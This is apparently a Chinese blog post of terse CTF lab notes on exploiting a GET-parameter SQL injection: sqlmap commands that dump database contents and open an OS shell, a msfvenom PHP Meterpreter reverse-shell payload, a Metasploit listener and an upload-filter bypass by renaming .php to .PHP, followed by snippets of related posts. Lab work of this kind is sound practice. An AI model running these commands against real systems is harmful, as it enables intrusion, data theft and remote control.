sql注入get参数

最新推荐文章于 2023-09-11 23:34:16 发布
最新推荐文章于 2023-09-11 23:34:16 发布
阅读量1.2k 收藏 5
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42434336/article/details/101447609
版权

攻击机192.168.43.61

靶机192.168.43.65

admin弱命令

web漏洞扫描器owasp-zap

cross site scripting 高危漏洞

sql注入漏洞,可直接获取服务器权限

使用sqlmap利用sql 注入漏洞

sqlmap -u url --dbs

information_schema自带数据库,不用管

sqlmap -u url -D --tables

sqlmap -u url -D -T --columns

sqlmap -u url -D -T -C --dump

sqlmap -u url -os-shell直接获取shell

上传shell 反弹权限

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 Iport=4444 -f raw

攻击机启动监听

gedit shellcd.php

msfconsole

msf >use exploit/multi/handler

msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > show options
msf5 exploit(multi/handler) > set lhost 192.168.1.108

run

查看端口netstat -pantu

上传shell执行shell

绕过过滤机制,利用.php修改为.PHP

点击shellcd监听端返回

 

^BonnenuIt
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF练习:SQL注入之get参数注入
qq_43233085的博客
11-24 4055
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
sqlmap学习(九)注入参数
rane的博客
03-27 325
1、sqlmap强制设置DBMS 默认情况下sqlmap自动探测目标web应用程序后台数据库管理系统 --dbms 数据库管理系统名称 [版本号] python sqlmap.py -u "http://172.17.0.1/Less-1/?id=1" --banner --dbms mysql 2、sqlmap强制设置OS python sqlmap.py -u "http://172.17...
SQL注入--get注入
weixin_52151447的博客
11-11 2436
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
SQL注入GET参数
FXHQAQ的博客
12-20 982
1、SQL注入漏洞介绍 sql注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。 SQL注入的产生原因通常表现在以下几个方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处...
SQL注入之GET型
最新发布
qq_51393133的博客
09-11 1067
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
SQL注入GET参数注入(提权版)
2303_76679642的博客
04-23 660
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。
DB2数据库SQL注入手册1
08-08
2. 参数化查询:使用参数化查询可以防止SQL注入攻击,因为恶意代码无法被作为参数传递。 3. 访问控制:限制数据库访问权限,以防止未经授权的访问。 常见SQL注入攻击 以下是一些常见的SQL注入攻击: 1. Union攻击...
泛微OA8前台sql注入1
08-08
1. 使用预编译的SQL语句(如Java的PreparedStatement),并绑定参数,避免SQL注入。 2. 对用户输入进行严格验证和过滤,只允许预期的字符和格式。 3. 限制应用程序对数据库的权限,避免使用具有广泛权限的数据库连接...
sql 注入POST Get 请求参数到Body常用正则表达式
andy5520的博客
03-31 1226
sql 注入POST Get 请求参数到Body常用正则表达式
CTF实验SQL注入GET参数
floyd_art的博客
03-30 723
SQL注入漏洞介绍 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交...
web靶机系列-GET参数注入
rlenew的博客
05-28 463
主机:192.168.136.133 靶机:192.168.136.143 用nmap、dirb扫描靶机 发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面 试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵 用owasp-zap扫描 发现有sql注入 利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs 有两个数据库 再用sqlmap -u http://192.168.136.1
CTF训练笔记(六)- HTTP服务(SQL注入→GET参数注入)(待续)
morrino的博客
04-27 1428
本文介绍了SQL注入中get参数注入部分,也介绍了一些渗透测试常用工具及具体使用实例
数字型GET注入
supermeatboy223的博客
02-16 1153
1.访问sqli-labs 选择关卡2 登录后根据页面提示 先给定一个GET参数。 在url后加上 ?id=1 此时页面显示 id=1 的用户名 Dump 密码 Dump 2.寻找注入点 分别使用一下三条payload http://192.168.5.152/sql/Less-2/?id=1' http://192.168.5.152/sql/Less-2/?id=1 and 1=1 http://192.168.5.152/sql/Less-2/?id=1 and 1=2 分别
sql注入靶场中的GET注入
weixin_75055385的博客
06-24 920
owasp十大漏洞中第一的sql注入
SQL注入入门攻略 SQL-LABS靶场 第1关 基于GET请求方式注入 ~
Jiuchen的博客
06-29 609
打开PhpStudy启动apache和mysql设置网站根目录指向保存的sql-labs目录 修改sql-labs数据库连接配置文件在sql-labs目录下的sql-connections/db-creds.inc文件改为自己实际的mysql账号和密码 默认为root/root 启用网站 (我的网站端口是8091)访问http://127.0.0.1:8091 页面打开效果图 安装security数据库点击页面中 Setup/reset Database for labs 至此 sql-labs搭建完成.
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3617
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
CTF夺旗-sql注入(get)
qq_43776408的博客
03-10 816
1. 结果 2. -T4最快速度扫描 -A 加载所有模块 -v 以一种尽可能详细的方式显示 3. 上张图片的黄色的部分,就是目标的网站的登录页面 你可以在历览器中访问这个页面 4. 这个软件是kali自带的 5. 5. ...
CTF-sql注入(get)
不知名白帽的博客
05-24 553
CTF-sql注入(get),实验环境:kali(192.168.20.128),靶机(192.168.20.131)。先探测敏感信息,再用owasp-zap进行漏洞扫描,然后根据漏洞类型,通过sqlmap进行漏洞的漏洞利用,再上传shell反弹权限
CTF-SQL注入(Get)
su__xiaoyan的博客
12-22 813
SQL注入 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 实验环境 攻击者:Kali Linux(192.168.100.146) 靶机:VMware workstations Pro——Debian 6(32-bit)(192.168.100.132) 注意:当前靶机中并没有flag值,需要通过靶机上面的SQL注入漏洞获取数据库中的内容,登陆网站后台,利用网站
sql注入getshell
09-09
### 回答1: SQL注入攻击是一种通过构造恶意的SQL语句来破坏数据库安全的技术。...总之,SQL注入是一种严重的安全问题,开发者应该重视,并采取相应的安全措施来防止SQL注入GetShell漏洞的发生,保护用户和系统的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值